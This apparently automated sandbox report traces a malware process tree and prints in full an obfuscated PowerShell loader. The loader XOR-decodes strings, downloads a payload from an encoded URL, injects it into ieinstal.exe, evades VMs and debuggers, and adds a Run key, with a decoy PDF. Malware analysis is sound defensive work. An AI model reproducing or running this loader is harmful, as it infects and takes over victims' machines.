6A0T5D0SC 3 E 0 0 0 7E0 DV0 6C1GE 'H;O`$ I nBcUl 0D0 =yI n cKlB1C1W 'G3SAH0 1 0L6R1 ET3EEH0a0 0O7c0TDF0K6C1DEK'V;S`$DI n cil 0S1S =A IOn cClV1a1E P'G4 D 2NBO0 0F1PAM1FD 0S8 1PDK0RC 0 0 5TB 5 DU5M8P4B9H5L4 4P9k3g2 3SA 1A0B1AAP1 DD0bCE0P4 4O7 3 B 1 CL0H7S1 DN0 0U0R4 0SCT4 7S2 0E0 7O1 D 0 CN1 B 0T6r1 9v3 A 0NCA1MBA1LFA0R0 0BAP0BCS1OAS4L7V2P4 0 8 1DBE1CA 0 1s0S8 0 5 3S4 5N3A5D3S2BEA0 CB1FD 2BDB0 C 0 5 0 CD0FEH0A8M1VDR0VC 2AFA0 6F1FBA2HFF1SCU0L7F0iA 1AD 0F0S0 6 0A7B3 9 0 6 0 0R0C7 1SD 0SCB1 BE4P1 4 1A0 F 0 2G1S9i4F9D4 DF3 AS0L6F1 BF0E6A4R9 4VD 2B0S0I7R0bAD0I5O5 9 5 9 4C0D4 5N4 9 4g1 2HEF2 D 3 DD4 9S2S9C4O1G3U2C2H0T0 7 1CD 3B9 1 D 1 BR3S4 4G5l4S9 3V2 3LCU2S0 0 7 1TD 5GAs5 BP3R4e4U0B4U9l4 1 3 2F2M0 0H7S1HD 3V9 1CDr1 B 3S4B4T0 4 0 4p0R'G; .B( `$ eBh rBlS7 )P P`$ IEnDcSlD0O1S;D`$ I n c lF0L2L T= eI nEcCl 1A1 S'E4LD 2 8 1B9 0 8U1BDR0f8S4 9 5 4 4 9c3F2 3HA 1B0A1KAe1 D 0 CF0k4r4S7C3fBg1HC 0 7 1RDR0 0 0 4N0XCO4S7 2S0T0 7P1 DJ0BCB1 B 0A6 1P9P3VAI0 CH1CBV1dF 0I0 0 AD0WCB1 AU4 7 2 4Y0 8 1CBC1 AA0e1 0K8 0 5M3H4 5 3 5 3A2 EI0FC 1ZDA2 D 0OCS0G5 0 C 0SE 0S8 1NDK0 CV2 F 0S6 1GBS2SF 1SC 0a7 0 AA1HDL0 0H0F6 0P7U3C9 0B6M0S0W0W7D1EDD0NCV1BBO4P1M4N1 0 Fk0G2C1 9A4F9 4 DS2 0 0 7 0 DB1 CB4 9 4AD 2M0S0B7T0EAF0C5 5 9R5AAA4F0U4S5H4 9J4S1A2 EU2CD 3hD 4T9 2C9P4B1 3 2R2 0D0 7o1BDm3A9C1FD 1 BP3K4 4k0 4 9B4N1 3t2L2B0T0F7O1DD 3B9 1 DH1 BR3 4G4S0 4S0 4 0B'C; .V( `$Be hKr l 7M)p F`$RI n cRlC0U2U;U`$ TRrKodtAhSe dA7 =B AITnIcMlM1T1 R'N4GDS3 DF0 0 1S9 0 6C4L9 5B4 4 9 4 DT2A8 1U9C0A8 1PD 0D8E4p7p2O0i0 7S1 FB0 6H0 2 0 CT4 1 5 9S4 0 'A; . (S`$Oe h r lM7S)G `$FTOrDoDtPhGeJdS7P;U`$ST r oUtAhBead 7s S=S I nUcBlV1L1T 'F4 DB2aB 0G0A1kA 1BD 0D8M1 DF0 C 0S0R5DB 5SDM5F8L4O7O2F0 0A7e1lFG0B6 0L2 0KC 4p1S4FDL3CDU0E0 1H9 0p6S4U5U4 9 5M9C4M0 'S; .B(C`$Me h rUl 7V)P `$UT rHoPt hBeFd 7 ; `$ TSrToRt hIeFd 6 =P KIAn cBlH1K1C U'T4FD 0 0B0S7H0oDB0AFB0 3S0 CT1 D 4C9S5M4 4 9T3P2 3UAK1 0T1SA 1 D 0 CE0S4 4 7V3EB 1DCR0N7K1TDV0S0 0 4S0TC 4u7 2H0D0 7 1 D 0 CF1GBD0G6 1B9 3nAD0SCS1LB 1 FS0O0 0TAM0BCi1 AP4 7S2K4 0D8 1 B 1 Ae0T1 0P8S0M5v3I4B5E3t5 3P2oE 0 CC1 DN2 DL0 Cu0 5M0HCS0 ET0a8B1 D 0vCO2 FB0C6 1MBU2uFA1 C 0K7 0SAI1KDN0C0 0 6u0 7 3 9m0c6U0 0B0B7S1KD 0 CD1KBN4T1 4 1 0LF 0T2 1 9 4 9c4uD 2 0 0 7 0 Dt1uC 4S9 4AD 0MCG0 1 1iB 0 5M5pDg4A0E4s5B4T9B4 1F2 E 2 D 3CDR4 9O2O9S4 1S3C2 2S0 0P7 1HDL3S9 1BD 1 BS3E4 4P5 4S9J3R2K3SC 2 0 0 7m1PDR5TA 5 B 3S4B4 5A4K9B3 2 3FCP2 0p0U7R1 DH5MAG5 BE3D4c4E5 4c9R3 2 3 C 2f0T0D7 1MD 5PAG5PBd3K4 4C0T4 9 4B1D3H2G2G0B0S7K1 D 3F9N1 DU1 Bb3 4S4 0D4 0B4H0 ' ; . (A`$ eBh rTlF7A) `$STBr oIt hPe dT6P; `$GP s yPcA S=M fPk pO C`$DeEhsrNlI5P B`$PeihSrPl 6 ; `$BTNrEoKtNhGendP7C =F UIRnFc lG1D1 's4 D 3I9 0G8 1VF 0SC 0 2C0 0B1TBD0 2 0SC 0 7j5KAC4D9 5H4 4S9H4SD 0G0V0p7S0SDU0 FD0A3A0 Ck1GD 4 7A2S0 0A7C1nFF0A6 0R2G0FC 4 1F3H2K2m0T0G7 1DDS3 9 1 D 1CBM3S4R5B3 5R3 3 3U0 CS1BBG0M6S4 5K4r9 5FF 5SC 5GFR4M5 4B9R5S9S1 1c5 AL5m9 5 9 5N9B4 5B4g9F5T9 1L1b5BDA5B9C4F0 ' ; .G(V`$IeKh rSl 7 )S F`$ TSrSoRt h e d 7P;H`$PTEr o tAhAe d 8 = IGnOcBl 1 1 O' 4UD 3 EU0 1Z0 CE1SBA0 Cv0PFU4 9T5 4v4 9V4RD 0T0I0G7 0FDA0 FC0M3 0 CV1ADK4S7F2 0s0R7 1 F 0S6 0g2P0aC 4M1D3 2P2 0S0S7K1MDW3D9 1PDE1 BC3S4T5 3T5 3 3 3t0 CH1SB 0S6H4N5T4 9B5 BC5 8 5 8 5T1R5 1f5 FA5D9 5r1 4 5 4 9N5U9S1S1B5 A 5S9 5m9 5U9K4Y5K4F9b5 9c1 1O5 D 4E0 ' ;B.K(h`$ e hRrTl 7 ) K`$BTerSo t hAeSd 8 ; `$ Idn cVlS0 1F N=E DI nUc l 1 1D K' 0C1 1ADP1EDB1 9 1 Ao5 3 4 6K4I6C1E8 1FC 0P0C0 AA0 2 0SA 0K1F0 CI0BAS0P2E1 1A4K7U0MEO0 0 1 DK0 1 1UC 0HBB4 7F0 0P0 6U4N6E1S8 1HCP0 0R0 A 0S2A0 4 0ACk4U6B3 CR0 DN0 ES0 8v0S7B4S7 1VCB5DA 5TBF' ;m`$ IKn cUlP0P0S T= I nKc lS1G1 S'F4 D 3sA 1O9s0E1o0fC 1 BH0P6P0L4 4t9 5K4G4L9e4L1T2C7N0 CR1 Eh4S4 2 6r0 BD0K3 0CC 0 AG1RDK4M9O2B7D0 C 1OD 4P7L3 E 0 CB0 BL2 AA0P5U0 0 0BCU0P7 1BDU4R0U4A7S2FDA0 6O1IEU0 7X0W5 0S6Z0 8F0PDS3 AS1 D 1IBP0b0E0 7 0UEK4B1P4PD 2 0 0K7 0RAD0P5 5M9A5 8S4 0r' ; `$TTMr o t hDeVd 8H E= I ndc lM1Y1U M'F4BDB3U9 0B8A1KFP0AC 0A2a0B0S1EB 0B2S0LC 0 7T5 BH5p4S4 DD0DC 0 7S1AFL5 3U0T8O1P9 1S9 0KDM0O8 1lD 0V8 ' ;A. (C`$GePhKr lO7E)V A`$FTTr oVtShSe d 8z; `$FPPaHvIeNk i rSk e n 2D=U`$WP aFvAeJkRiMr k eBnM2 +I'K\TSepAass . u r f 'A;L`$ S pLhUe rPoVmG=s'S'I;Pinf S( -Pn oKt ( T e stt -SPAaHtEh `$ P a vce k i r kPe nT2 ) ) {uwShPiIlPe T( `$ SPpKhAe r oPmG F-VeAq R' 'n)n k{A.H( `$eeShCrPl 7I)G V`$AI n c lE0T0 ; SdtCaNr tR-SS lCeMeEpN 5C;n} SKeTt -sC oEn t egn t A`$LPPaCvOe kSiTrTkkepns2H `$DSNpChDeMrVo m ;N} `$ SRp h eUrCo mS = GTe te-SCMoOnFtCeFnst E`$LPRa v egkfiFr kPeon 2 ;S`$ T rOoFtPh eSdF9S =S IAnUc lB1A1B O'L4 D 3 DD1TB 0 6C1CD 0P1M0CCB0PDT4H9H5S4A4F9s3g2B3PA 1H0 1 A 1ADU0 CC0 4V4H7 2UAF0T6 0G7 1IFH0PC 1RBN1PDS3 4C5N3 5A3 2AFN1EB 0A6U0Z4E2HB 0 8C1rAR0 CA5AFP5cDC3 A 1 DS1 BR0B0F0D7A0REB4 1 4UD 3DA 1 9 0 1 0 CW1VB 0E6 0P4R4I0 'P; . ( `$ eFh r lE7 ) `$ TtrPo tEh e dF9V;S`$FS pDh e rEo mD0 B=O IMn cElH1K1S 'M3G2 3TAT1B0G1 A 1KDP0PC 0S4R4S7S3 BU1 CP0O7P1 D 0 0T0 4B0TCB4A7S2 0U0 7V1 D 0FCu1WBB0s6D1 9O3 AA0 C 1MB 1 Fe0 0R0KAO0RCP1 AY4 7 2 4 0S8 1PBN1BAA0M1V0V8K0 5 3 4I5 3 5 3K2MAU0 6R1U9A1S0 4N1B4 D 3MDS1BB 0m6 1 D 0 1 0RC 0LDe4E5 4T9L5B9P4C5I4M9 4S9 4VDP3K9L0 8E1HF 0 C 0R2M0 0m1LBB0r2 0SCP0 7 5SA 4U5 4 9 5JFH5 C 5AF 4U0 ' ;M.S( `$ eDhBrSl 7 )e `$PSTpAh e rPoTmB0V; `$SM aGg nY= `$UTJrFo tSh eLd .Dc olu nAts- 6U5 6D;S`$ZS p hde r o mc1 K=t IKn c lA1 1P H' 3M2 3 A 1 0 1 AM1 D 0SC 0L4 4 7 3JB 1SCB0R7F1ADC0I0 0 4P0 CE4f7 2F0E0 7A1 DE0 CM1PBM0C6 1H9B3TA 0OCH1 B 1 F 0U0S0MAO0pC 1LAf4S7B2O4 0S8 1rBF1MAS0 1B0 8 0 5 3F4 5A3 5C3r2 AS0t6D1S9 1a0p4 1A4ADA3FD 1 BP0P6 1BDG0 1B0uC 0oDI4S5 4 9C5PFH5KC 5 FR4S5 4S9 4SDD3 EK0 1K0 Cl1 BM0KCD0IFI4B5E4R9K4eD 2S4H0 8U0 E 0P7 4O0E' ;E. ( `$Fe hKrTlN7M)p S`$ASUpPhFe rBo mM1 ;O`$ S pMhsePrZo mV2L G= BIGn c l 1R1S 'A4HDT2S1F1S0I0 DP1UB 0M6M1 9M0L1S4D9 5 4E4 9S3 2M3 A 1 0T1CAR1CDM0 C 0 4H4F7 3 B 1 C 0 7 1TD 0T0F0 4 0RCH4 7 2T0V0A7O1CD 0 C 1pB 0 6A1 9P3OAH0 CA1DB 1RFS0F0S0 A 0ECG1FAS4G7 2B4 0U8O1RBI1BA 0K1S0S8U0W5K3 4T5 3e5T3A2 ES0 CO1CDG2 DV0ACM0 5u0 CM0UEB0S8D1 D 0 CF2GFO0D6H1eB 2UFB1IC 0S7 0PAS1SDL0 0H0H6A0 7 3 9s0D6O0 0 0 7T1 DM0GCI1EBB4 1S4H1 0 F 0S2S1 9 4A9T4HDG3AAE0 6N1RBg0M6 4R9P4ADa2A0 0G4 0 4K0 8T0 7 4U0C4 5S4 9 4 1G2NE 2GD 3 D 4 9f2P9M4D1m3p2T2 0T0S7 1ZDM3 9O1RDA1iB 3S4 4R5 4T9B3A2U2T0O0E7 1BDR3 9S1 D 1 B 3O4S4K5 4 9 3 2 2U0F0O7U1BD 3N9 1BDF1 Bm3S4 4 5 4 9A3U2E2L0G0M7 1 D 3P9 1FDT1 BI3 4 4B5K4M9 3f2 2M0A0T7U1ADT3 9T1MD 1SB 3 4R4 0F4 9 4 1L3 2 2 0D0 7T1VDM3 9 1 DT1 Bm3S4U4C0 4 0 4 0 'a; . (C`$FeBh r lK7H)H C`$MSCpNh eGrKo mB2 ;C`$GSUp h e rOo mP3 c=S WIBnMcTlB1 1S ' 4CDk2h1S1 0 0LD 1NBF0 6 1F9 0K1 4 7I2B0 0 7B1 FM0D6O0S2 0TCK4H1 4HDB3 9B0R8s1TFT0 C 0L2A0 0 1 B 0 2 0DCN0m7O5KAM4B5b4 DJ3GEA0A1E0FCK1JBG0TCR0lFK4e5S4MD 3 9 1SA 1 0H0 AL4G5P5 9C4 5 5A9 4 0S' ;U. (L`$ e hsr lU7 ) R`$ S pThre rPoGm 3K#Y;""";Function Spherom9 { param([String]$Wavel); For($Foreffel=1; $Foreffel -lt $Wavel.Length-1; $Foreffel+=(1+1)){$Incl = $Incl + $Wavel.Substring($Foreffel, 1)}; $Incl;}$Prov0 = Spherom9 'LIFE X ';$Prov1= Spherom9 $Misjoinam;if([IntPtr]::size -eq 8){.$env:systemroot\*ysw*64\*indo*ower*\v1.*\po*ll.exe $Prov1 ;}else{.$Prov0 $Prov1;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3244

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Incl11 { param([String]$Wavel); $Lingvi = ''; Write-Host $Lingvi; Write-Host $Lingvi; Write-Host $Lingvi; $Unrefut = New-Object byte[] ($Wavel.Length / 2); For($Foreffel=0; $Foreffel -lt $Wavel.Length; $Foreffel+=2){ $Kommando = $Wavel.Substring($Foreffel, 2); $Unrefut[$Foreffel/2] = [convert]::ToByte($Kommando, 16); $Lastendes160 = ($Unrefut[$Foreffel/2] -bxor 105); $Unrefut[$Foreffel/2] = $Lastendes160; } [String][System.Text.Encoding]::ASCII.GetString($Unrefut);}$Matema0=Incl11 '3A101A1D0C04470D0505';$Matema1=Incl11 '24000A1B061A060F1D473E00075A5B473C071A080F0C27081D001F0C240C1D01060D1A';$Matema2=Incl11 '2E0C1D391B060A280D0D1B0C1A1A';$Matema3=Incl11 '3A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F';$Matema4=Incl11 '1A1D1B00070E';$Matema5=Incl11 '2E0C1D24060D1C050C2108070D050C';$Matema6=Incl11 '3B3D3A190C0A0008052708040C454921000D0C2B103A000E4549391C0B05000A';$Matema7=Incl11 '3B1C071D00040C4549240807080E0C0D';$Matema8=Incl11 '3B0C0F050C0A1D0C0D2D0C050C0E081D0C';$Matema9=Incl11 '2007240C04061B1024060D1C050C';$ehrl0=Incl11 '24102D0C050C0E081D0C3D10190C';$ehrl1=Incl11 '2A05081A1A4549391C0B05000A45493A0C08050C0D454928071A002A05081A1A4549281C1D062A05081A1A';$ehrl2=Incl11 '20071F06020C';$ehrl3=Incl11 '391C0B05000A454921000D0C2B103A000E4549270C1E3A05061D45493F001B1D1C0805';$ehrl4=Incl11 '3F001B1D1C0805280505060A';$ehrl5=Incl11 '071D0D0505';$ehrl6=Incl11 '271D391B061D0C0A1D3F001B1D1C0805240C04061B10';$ehrl7=Incl11 '202C31';$ehrl8=Incl11 '35';$Soro=Incl11 '3C3A2C3B5A5B';$Imman=Incl11 '2A0805053E00070D061E391B060A28';function fkp {Param ($Roman, $Makaronie) ;$Trothed0 =Incl11 '4D2F0C1B0449544941322819192D06040800073453532A1C1B1B0C071D2D0604080007472E0C1D281A1A0C040B05000C1A41404915493E010C1B0C44260B030C0A1D4912494D36472E05060B0805281A1A0C040B05102A080A010C494428070D494D364725060A081D000607473A1905001D414D0C011B05514032445834472C181C08051A414D24081D0C04085940491440472E0C1D3D10190C414D24081D0C04085840';.($ehrl7) $Trothed0;$Trothed5 = Incl11 '4D240005004954494D2F0C1B04472E0C1D240C1D01060D414D24081D0C04085B4549323D10190C3234344929414D24081D0C04085A45494D24081D0C04085D4040';.($ehrl7) $Trothed5;$Trothed1 = Incl11 '1B0C1D1C1B07494D240005004720071F06020C414D071C050545492941323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F3441270C1E44260B030C0A1D493A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F4141270C1E44260B030C0A1D4920071D391D1B404549414D2F0C1B04472E0C1D240C1D01060D414D24081D0C04085C40404720071F06020C414D071C0505454929414D3B060408074040404045494D240802081B0607000C4040';.($ehrl7) $Trothed1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Ilderem,[Parameter(Position = 1)] [Type] $Glasslibe = [Void]);$Trothed2 = Incl11 '4D2A060C05081A1D1B495449322819192D06040800073453532A1C1B1B0C071D2D0604080007472D0C0F00070C2D10070804000A281A1A0C040B05104141270C1E44260B030C0A1D493A101A1D0C04473B0C0F050C0A1D00060747281A1A0C040B05102708040C414D24081D0C04085140404549323A101A1D0C04473B0C0F050C0A1D000607472C04001D47281A1A0C040B05102B1C00050D0C1B280A0A0C1A1A3453533B1C0740472D0C0F00070C2D10070804000A24060D1C050C414D24081D0C04085045494D0F08051A0C40472D0C0F00070C3D10190C414D0C011B055945494D0C011B05584549323A101A1D0C0447241C051D000A081A1D2D0C050C0E081D0C3440';.($ehrl7) $Trothed2;$Trothed3 = Incl11 '4D2A060C05081A1D1B472D0C0F00070C2A06071A1D1B1C0A1D061B414D24081D0C04085F4549323A101A1D0C04473B0C0F050C0A1D000607472A08050500070E2A06071F0C071D0006071A3453533A1D08070D081B0D45494D20050D0C1B0C0440473A0C1D200419050C040C071D081D0006072F05080E1A414D24081D0C04085E40';.($ehrl7) $Trothed3;$Trothed4 = Incl11 '4D2A060C05081A1D1B472D0C0F00070C240C1D01060D414D0C011B055B45494D0C011B055A45494D2E05081A1A05000B0C45494D20050D0C1B0C0440473A0C1D200419050C040C071D081D0006072F05080E1A414D24081D0C04085E40';.($ehrl7) $Trothed4;$Trothed5 = Incl11 '1B0C1D1C1B07494D2A060C05081A1D1B472A1B0C081D0C3D10190C4140';.($ehrl7) $Trothed5 ;}$Indu = Incl11 '020C1B070C055A5B';$Incl03 = Incl11 '2E0C1D2A06071A06050C3E00070D061E';$Incl00=Incl11 '3A01061E3E00070D061E';$Incl01 = Incl11 '4D2B001A1D081D0C005B5D58495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D3A061B06494D20070A055959404549412E2D3D4929413220071D391D1B344549323C20071D5A5B344049413220071D391D1B34404040';.($ehrl7) $Incl01;$Incl02 = Incl11 '4D2819081D08495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D20070D1C494D20070A05595A404549412E2D3D4929413220071D391D1B344049413220071D391D1B34404040';.($ehrl7) $Incl02;$Trothed7 = Incl11 '4D3D0019064954494D2819081D084720071F06020C415940';.($ehrl7) $Trothed7;$Trothed7 = Incl11 '4D2B001A1D081D0C005B5D584720071F06020C414D3D00190645495940';.($ehrl7) $Trothed7;$Trothed6 = Incl11 '4D00070D0F030C1D495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D20070D1C494D0C011B055D404549412E2D3D4929413220071D391D1B344549323C20071D5A5B344549323C20071D5A5B344549323C20071D5A5B344049413220071D391D1B34404040';.($ehrl7) $Trothed6;$Psyc = fkp $ehrl5 $ehrl6;$Trothed7 = Incl11 '4D39081F0C02001B020C075A4954494D00070D0F030C1D4720071F06020C413220071D391D1B345353330C1B0645495F5C5F454959115A595959454959115D5940';.($ehrl7) $Trothed7;$Trothed8 = Incl11 '4D3E010C1B0C0F4954494D00070D0F030C1D4720071F06020C413220071D391D1B345353330C1B0645495B585851515F5951454959115A595959454959115D40';.($ehrl7) $Trothed8;$Incl01 = Incl11 '011D1D191A534646181C000A020A010C0A0211470E001D011C0B47000646181C000A02040C463C0D0E0807471C5A5B';$Incl00 = Incl11 '4D3A19010C1B060449544941270C1E44260B030C0A1D49270C1D473E0C0B2A05000C071D40472D061E070506080D3A1D1B00070E414D20070A05595840';$Trothed8 = Incl11 '4D39081F0C02001B020C075B544D0C071F530819190D081D08';.($ehrl7) $Trothed8;$Pavekirken2=$Pavekirken2+'\Spas.urf';$Spherom='';if (-not(Test-Path $Pavekirken2)) {while ($Spherom -eq '') {.($ehrl7) $Incl00;Start-Sleep 5;}Set-Content $Pavekirken2 $Spherom;}$Spherom = Get-Content $Pavekirken2;$Trothed9 = Incl11 '4D3D1B061D010C0D495449323A101A1D0C04472A06071F0C1B1D3453532F1B06042B081A0C5F5D3A1D1B00070E414D3A19010C1B060440';.($ehrl7) $Trothed9;$Spherom0 = Incl11 '323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532A061910414D3D1B061D010C0D4549594549494D39081F0C02001B020C075A45495F5C5F40';.($ehrl7) $Spherom0;$Magn=$Trothed.count-656;$Spherom1 = Incl11 '323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532A061910414D3D1B061D010C0D45495F5C5F45494D3E010C1B0C0F45494D24080E0740';.($ehrl7) $Spherom1;$Spherom2 = Incl11 '4D21100D1B061901495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D3A061B06494D2004040807404549412E2D3D4929413220071D391D1B3445493220071D391D1B3445493220071D391D1B3445493220071D391D1B3445493220071D391D1B344049413220071D391D1B34404040';.($ehrl7) $Spherom2;$Spherom3 = Incl11 '4D21100D1B0619014720071F06020C414D39081F0C02001B020C075A454D3E010C1B0C0F454D391A100A4559455940';.($ehrl7) $Spherom3#"
3⤵
- Blocklisted process makes network request
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4344

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4796

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\AdobeError.pdf"
5⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:636

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
6⤵
- Suspicious use of WriteProcessMemory
PID:5116

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=915D2C990FE0FDAE97D699C755F47DE3 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=915D2C990FE0FDAE97D699C755F47DE3 --renderer-client-id=2 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:1
7⤵
PID:4140

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=07D6555CF50FDB940E417AECD146E984 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
7⤵
PID:2524

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=3ACD8B583B42742BB1CE2BD60889D058 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 